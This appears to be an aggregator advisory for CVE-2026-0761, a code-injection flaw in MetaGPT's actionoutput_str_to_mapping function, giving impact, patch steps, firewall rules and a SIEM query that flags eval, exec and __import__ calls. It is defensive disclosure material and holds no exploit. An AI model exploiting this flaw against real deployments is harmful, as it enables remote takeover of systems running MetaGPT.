CVE-2026-0761
📋 TL;DR
This critical vulnerability allows unauthenticated remote attackers to execute arbitrary Python code on systems running vulnerable versions of Foundation Agents MetaGPT. The flaw exists in the actionoutput_str_to_mapping function which fails to properly validate user input before execution. Any organization using affected MetaGPT installations is at risk of complete system compromise.
💻 Affected Systems
- Foundation Agents MetaGPT
📦 What is this software?
Metagpt by Deepwisdom
⚠️ Risk & Real-World Impact
Worst Case
Complete system takeover with attacker gaining service account privileges, data exfiltration, lateral movement, and persistent backdoor installation.
Likely Case
Remote code execution leading to data theft, cryptocurrency mining, or ransomware deployment on vulnerable systems.
If Mitigated
Limited impact if proper network segmentation, least privilege, and input validation controls are implemented.
🎯 Exploit Status
ZDI-CAN-28124 indicates coordinated vulnerability disclosure, but the low complexity and unauthenticated nature make weaponization likely.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor advisory for specific version
Vendor Advisory: https://www.zerodayinitiative.com/advisories/ZDI-26-027/
Restart Required: Yes
Instructions:
1. Check the ZDI advisory for patch availability
2. Update to the latest patched version of MetaGPT
3. Restart the MetaGPT service
4. Verify the fix is applied
🔧 Temporary Workarounds
Network Isolation
linuxRestrict network access to MetaGPT instances
iptables -A INPUT -p tcp --dport [META_PORT] -s [TRUSTED_IPS] -j ACCEPT
iptables -A INPUT -p tcp --dport [META_PORT] -j DROP
Input Validation Wrapper
allImplement input sanitization before the vulnerable function
Implement custom wrapper that validates/sanitizes input to actionoutput_str_to_mapping
🧯 If You Can't Patch
- Immediately isolate vulnerable systems from internet and critical networks
- Implement strict network segmentation and monitor for exploitation attempts
🔍 How to Verify
Check if Vulnerable:
Check if MetaGPT version is unpatched and the vulnerable function exists in codebaseCheck Version:
Check MetaGPT documentation for version command or examine package metadataVerify Fix Applied:
Verify patch is applied by checking version and testing input validation📡 Detection & Monitoring
Log Indicators:
- Unusual Python execution patterns
- Suspicious imports or eval() calls in logs
- Unexpected process spawns from MetaGPT service
Network Indicators:
- Unusual outbound connections from MetaGPT host
- Traffic to known malicious IPs
SIEM Query:
source="metagpt" AND (eval OR exec OR __import__) OR process_name="python" AND parent_process="metagpt"